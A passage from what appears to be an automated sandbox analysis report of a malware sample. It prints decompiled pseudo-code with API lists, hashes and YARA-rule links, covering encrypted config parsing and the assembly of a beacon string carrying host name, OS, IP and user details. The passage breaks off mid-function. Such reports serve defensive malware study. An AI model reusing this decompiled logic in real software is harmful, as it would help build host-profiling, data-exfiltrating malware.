				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E0495A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0495A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x049558e0
                                                          0x049558eb
                                                          0x049558ed
                                                          0x049558f3
                                                          0x049558f5
                                                          0x049558fa
                                                          0x04955903
                                                          0x04955907
                                                          0x04955910
                                                          0x04955914
                                                          0x04955923
                                                          0x04955916
                                                          0x04955917
                                                          0x0495591c
                                                          0x0495591c
                                                          0x04955914
                                                          0x04955907
                                                          0x0495592c

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04951FA0,74B5F710,00000000,?,?,04951FA0), ref: 049558F3
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04951FA0,04951FA1,?,?,04951FA0), ref: 04955910
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 089a86f9d79610d7eed419d65382a93232b6654ef04eaccbd1aa240fb5a1c401
                                                          • Instruction ID: 0a87888db34e3fbf66dcf4baa558ff22ffdb0964e8aadd9ad35e57773c7d29d9
                                                          • Opcode Fuzzy Hash: 089a86f9d79610d7eed419d65382a93232b6654ef04eaccbd1aa240fb5a1c401
                                                          • Instruction Fuzzy Hash: 9EF0902AA00205BAEB11D6A98C10EAF66BDDBC4620F320079E900E3105EA74EA01C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04954ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x495d23c) == 0) {
						E04951B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x495d23c) == 1) {
						_t10 = E049512E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x04954ed1
                                                          0x04954ed2
                                                          0x04954ed5
                                                          0x04954f07
                                                          0x04954f09
                                                          0x04954f09
                                                          0x04954ed7
                                                          0x04954ed8
                                                          0x04954eed
                                                          0x04954ef4
                                                          0x04954ef6
                                                          0x04954ef6
                                                          0x04954ef4
                                                          0x04954ed8
                                                          0x04954f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0495D23C), ref: 04954EDF
                                                            • Part of subcall function 049512E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04954EF2,?), ref: 049512F8
                                                          • InterlockedDecrement.KERNEL32(0495D23C), ref: 04954EFF
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 0642249df72cd5a0bf639020846c7f4965d69ad2ced398fc3f352c0f08f94f1f
                                                          • Instruction ID: 252b173115e74d04d2ebc5cb78fe3a1175e7538040a8e3dbd80a879c1fc2a32a
                                                          • Opcode Fuzzy Hash: 0642249df72cd5a0bf639020846c7f4965d69ad2ced398fc3f352c0f08f94f1f
                                                          • Instruction Fuzzy Hash: D7E0482128823557A761DE789909B5A954A9FC1754F318534EC8AD1030D610F8809795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04951AE2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E04951AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                          0x04951ae2
                                                          0x04951aef
                                                          0x04951af0
                                                          0x04951af1
                                                          0x04951af8
                                                          0x04951b26
                                                          0x04951b27
                                                          0x04951b2a
                                                          0x04951b30
                                                          0x00000000
                                                          0x00000000
                                                          0x04951b0f
                                                          0x04951b19
                                                          0x04951b20
                                                          0x00000000
                                                          0x04951b11
                                                          0x04951b14
                                                          0x04951b34
                                                          0x04951b16
                                                          0x04951b16
                                                          0x00000000
                                                          0x04951b16
                                                          0x04951b14
                                                          0x04951b3b
                                                          0x04951b41
                                                          0x04951b41
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 04951B2A
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 039372dd4edb7104c30c53a2d4dc6c06b6ff855e438add9c96040cef4064c08a
                                                          • Instruction ID: 09556ff530ee65baab4cc6cc9d8feb391449489c0017a094f6c08648eac5061f
                                                          • Opcode Fuzzy Hash: 039372dd4edb7104c30c53a2d4dc6c06b6ff855e438add9c96040cef4064c08a
                                                          • Instruction Fuzzy Hash: 4FF0E775D01218EFDB00DB94D589AEDB7B8EF04305F2484BAE902A7254E7B46B84DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0495888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E0495888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x495d2a4; // 0x63699bc3
				if(E04957145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x495d2d8 = _v8;
				}
				_t31 =  *0x495d2a4; // 0x63699bc3
				if(E04957145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x495d2a4; // 0x63699bc3
				if(E04957145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x495d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x495d2a4; // 0x63699bc3
						_t43 = E04956B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x495d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x495d2a4; // 0x63699bc3
						_t44 = E04956B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x495d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x495d2a4; // 0x63699bc3
						_t45 = E04956B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x495d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x495d2a4; // 0x63699bc3
						_t46 = E04956B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x495d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x495d2a4; // 0x63699bc3
						_t47 = E04956B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x495d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x495d2a4; // 0x63699bc3
						_t48 = E04956B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E049556FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E04956702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x495d2a4; // 0x63699bc3
						_t49 = E04956B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E049556FA(0, _t49) != 0) {
						_t114 =  *0x495d32c; // 0x4dd95b0
						E049523F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x495d2a4; // 0x63699bc3
						_t50 = E04956B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x495d2a8; // 0x47a5a8
						_t20 = _t51 + 0x495e252; // 0x616d692f
						 *0x495d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E049556FA(0, _t50);
						 *0x495d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x495d2a4; // 0x63699bc3
								_t53 = E04956B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x495d2a8; // 0x47a5a8
								_t21 = _t54 + 0x495e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E049556FA(0, _t53);
							}
							 *0x495d340 = _t55;
							HeapFree( *0x495d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x0495888e
                                                          0x04958891
                                                          0x049588b1
                                                          0x049588bf
                                                          0x049588bf
                                                          0x049588c4
                                                          0x049588de
                                                          0x04958b0d
                                                          0x04958b14
                                                          0x04958b1b
                                                          0x04958b1b
                                                          0x049588e4
                                                          0x04958900
                                                          0x04958afb
                                                          0x04958b05
                                                          0x00000000
                                                          0x04958906
                                                          0x04958906
                                                          0x0495890b
                                                          0x04958921
                                                          0x0495890d
                                                          0x0495890d
                                                          0x0495891a
                                                          0x0495891a
                                                          0x0495892b
                                                          0x0495892d
                                                          0x04958937
                                                          0x0495893c
                                                          0x0495893c
                                                          0x04958937
                                                          0x04958943
                                                          0x04958959
                                                          0x04958945
                                                          0x04958945
                                                          0x04958952
                                                          0x04958952
                                                          0x0495895d
                                                          0x0495895f
                                                          0x04958969
                                                          0x0495896e
                                                          0x0495896e
                                                          0x04958969
                                                          0x04958975
                                                          0x0495898b
                                                          0x04958977
                                                          0x04958977
                                                          0x04958984
                                                          0x04958984
                                                          0x0495898f
                                                          0x04958991
                                                          0x0495899b
                                                          0x049589a0
                                                          0x049589a0
                                                          0x0495899b
                                                          0x049589a7
                                                          0x049589bd
                                                          0x049589a9
                                                          0x049589a9
                                                          0x049589b6
                                                          0x049589b6
                                                          0x049589c1
                                                          0x049589c3
                                                          0x049589cd
                                                          0x049589d2
                                                          0x049589d2
                                                          0x049589cd
                                                          0x049589d9
                                                          0x049589ef
                                                          0x049589db
                                                          0x049589db
                                                          0x049589e8
                                                          0x049589e8
                                                          0x049589f3
                                                          0x049589f5
                                                          0x049589ff
                                                          0x04958a04
                                                          0x04958a04
                                                          0x049589ff
                                                          0x04958a0b
                                                          0x04958a21
                                                          0x04958a0d
                                                          0x04958a0d
                                                          0x04958a1a
                                                          0x04958a1a
                                                          0x04958a25
                                                          0x04958a27
                                                          0x04958a2a
                                                          0x04958a2b
                                                          0x04958a32
                                                          0x04958a34
                                                          0x04958a35
                                                          0x04958a35
                                                          0x04958a32
                                                          0x04958a3c
                                                          0x04958a52
                                                          0x04958a3e
                                                          0x04958a3e
                                                          0x04958a4b
                                                          0x04958a4b
                                                          0x04958a56
                                                          0x04958a64
                                                          0x04958a6e
                                                          0x04958a6e
                                                          0x04958a75
                                                          0x04958a8b
                                                          0x04958a77
                                                          0x04958a77
                                                          0x04958a84
                                                          0x04958a84
                                                          0x04958a8f
                                                          0x04958aa2
                                                          0x04958aa2
                                                          0x04958aa7
                                                          0x04958aad
                                                          0x00000000
                                                          0x04958a91
                                                          0x04958a94
                                                          0x04958a99
                                                          0x04958aa0
                                                          0x04958ab2
                                                          0x04958ab4
                                                          0x04958aca
                                                          0x04958ab6
                                                          0x04958ab6
                                                          0x04958ac3
                                                          0x04958ac3
                                                          0x04958ace
                                                          0x04958ada
                                                          0x04958adf
                                                          0x04958adf
                                                          0x04958ad0
                                                          0x04958ad3
                                                          0x04958ad3
                                                          0x04958aed
                                                          0x04958af2
                                                          0x04958af8
                                                          0x00000000
                                                          0x04958af8
                                                          0x00000000
                                                          0x04958aa0
                                                          0x04958a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 04958933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 04958965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 04958997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 049589C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 049589FB
                                                          • HeapFree.KERNEL32(00000000,04955D25,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008,?,04955D25), ref: 04958AF2
                                                          • HeapFree.KERNEL32(00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008,?,04955D25), ref: 04958B05
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 458d975d37b4fb2f00c42c28b0a04737fda1bbb5a9fd249002495aacca1397fe
                                                          • Instruction ID: a67f93c1d5bf899f257193d9619970b59a78425e3670f5210ee03205006149eb
                                                          • Opcode Fuzzy Hash: 458d975d37b4fb2f00c42c28b0a04737fda1bbb5a9fd249002495aacca1397fe
                                                          • Instruction Fuzzy Hash: 80717D74A04205AFEB10FBB9E984D5BBBEDEF883407344A31E806D7124E675FD528B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04951F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E04951F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x495d018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x495d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x495d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E0495D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x495d2a8; // 0x47a5a8
				_t3 = _t30 + 0x495e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x495d02c,  *0x495d004, _t25);
				_t33 = E049556CD();
				_t34 =  *0x495d2a8; // 0x47a5a8
				_t4 = _t34 + 0x495e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E049558DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x495d2a8; // 0x47a5a8
					_t6 = _t83 + 0x495e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x495d238, 0, _t96);
				}
				_t97 = E0495A199();
				if(_t97 != 0) {
					_t78 =  *0x495d2a8; // 0x47a5a8
					_t8 = _t78 + 0x495e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x495d238, 0, _t97);
				}
				_t98 =  *0x495d32c; // 0x4dd95b0
				_a32 = E04954622(0x495d00a, _t98 + 4);
				_t42 =  *0x495d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x495d2a8; // 0x47a5a8
					_t11 = _t74 + 0x495e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x495d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x495d2a8; // 0x47a5a8
					_t13 = _t71 + 0x495e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x495d238, 0, 0x800);
					if(_t100 != 0) {
						E0495518F(GetTickCount());
						_t50 =  *0x495d32c; // 0x4dd95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x495d32c; // 0x4dd95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x495d32c; // 0x4dd95b0
						_t103 = E04951BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x495c28c);
							_push(_t103);
							_t62 = E0495361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04956777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04956761();
								}
								HeapFree( *0x495d238, 0, _v44);
							}
							HeapFree( *0x495d238, 0, _t103);
						}
						HeapFree( *0x495d238, 0, _t100);
					}
					HeapFree( *0x495d238, 0, _a24);
				}
				HeapFree( *0x495d238, 0, _t105);
				return _a12;
			}
















































                                                          0x04951f13
                                                          0x04951f13
                                                          0x04951f13
                                                          0x04951f18
                                                          0x04951f1e
                                                          0x04951f28
                                                          0x04951f2a
                                                          0x04951f2a
                                                          0x04951f37
                                                          0x04951f42
                                                          0x04951f45
                                                          0x04951f50
                                                          0x04951f53
                                                          0x04951f58
                                                          0x04951f5b
                                                          0x04951f60
                                                          0x04951f63
                                                          0x04951f6f
                                                          0x04951f7c
                                                          0x04951f7e
                                                          0x04951f84
                                                          0x04951f89
                                                          0x04951f94
                                                          0x04951f96
                                                          0x04951f99
                                                          0x04951fa0
                                                          0x04951fa4
                                                          0x04951fa6
                                                          0x04951fab
                                                          0x04951fb7
                                                          0x04951fb9
                                                          0x04951fc5
                                                          0x04951fc7
                                                          0x04951fc7
                                                          0x04951fd2
                                                          0x04951fd6
                                                          0x04951fd8
                                                          0x04951fdd
                                                          0x04951fe9
                                                          0x04951feb
                                                          0x04951ff7
                                                          0x04951ff9
                                                          0x04951ff9
                                                          0x04951fff
                                                          0x04952012
                                                          0x04952016
                                                          0x0495201d
                                                          0x04952020
                                                          0x04952025
                                                          0x04952030
                                                          0x04952032
                                                          0x04952035
                                                          0x04952035
                                                          0x04952037
                                                          0x0495203e
                                                          0x04952041
                                                          0x04952046
                                                          0x04952050
                                                          0x04952052
                                                          0x0495205a
                                                          0x04952073
                                                          0x04952077
                                                          0x04952083
                                                          0x04952088
                                                          0x04952091
                                                          0x049520a2
                                                          0x049520a6
                                                          0x049520af
                                                          0x049520b5
                                                          0x049520c2
                                                          0x049520cf
                                                          0x049520d5
                                                          0x049520e1
                                                          0x049520e7
                                                          0x049520e8
                                                          0x049520ed
                                                          0x049520f3
                                                          0x049520f9
                                                          0x04952100
                                                          0x04952107
                                                          0x0495210d
                                                          0x04952114
                                                          0x04952118
                                                          0x04952123
                                                          0x04952128
                                                          0x0495212e
                                                          0x04952137
                                                          0x04952137
                                                          0x04952148
                                                          0x04952148
                                                          0x04952157
                                                          0x04952157
                                                          0x04952166
                                                          0x04952166
                                                          0x04952178
                                                          0x04952178
                                                          0x04952187
                                                          0x04952198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04951F2A
                                                          • wsprintfA.USER32 ref: 04951F77
                                                          • wsprintfA.USER32 ref: 04951F94
                                                          • wsprintfA.USER32 ref: 04951FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04951FC7
                                                          • wsprintfA.USER32 ref: 04951FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04951FF9
                                                          • wsprintfA.USER32 ref: 04952030
                                                          • wsprintfA.USER32 ref: 04952050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0495206D
                                                          • GetTickCount.KERNEL32 ref: 0495207D
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 04952091
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 049520AF
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,049520C2,?,04DD95B0), ref: 04951BE1
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(?,?,?,049520C2,?,04DD95B0), ref: 04951BE9
                                                            • Part of subcall function 04951BB6: strcpy.NTDLL ref: 04951C00
                                                            • Part of subcall function 04951BB6: lstrcat.KERNEL32(00000000,?), ref: 04951C0B
                                                            • Part of subcall function 04951BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04951C28
                                                          • StrTrimA.SHLWAPI(00000000,0495C28C,?,04DD95B0), ref: 049520E1
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(04DD9A78,00000000,00000000,7742C740,049520ED,00000000), ref: 0495362A
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(?), ref: 04953632
                                                            • Part of subcall function 0495361A: lstrcpy.KERNEL32(00000000,04DD9A78), ref: 04953646
                                                            • Part of subcall function 0495361A: lstrcat.KERNEL32(00000000,?), ref: 04953651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04952100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04952107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04952114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04952118
                                                            • Part of subcall function 04956777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04956829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04952148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04952157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04DD95B0), ref: 04952166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04952178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04952187
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 435064076b7e53778c2f9a382a0d12242c65efed213e8d7ff34fde38fcd01daf
                                                          • Instruction ID: 363be3cbec3a529a0df6d590f348a883bc087febd6bb425e421cd87ebd95c42b
                                                          • Opcode Fuzzy Hash: 435064076b7e53778c2f9a382a0d12242c65efed213e8d7ff34fde38fcd01daf
                                                          • Instruction Fuzzy Hash: 21617B31504300AFEB11EBA4EC48E567BECEB49354F344634FA08D6260DB39EC05DB66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04956C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E04956C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x495d33c; // 0x4dd9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
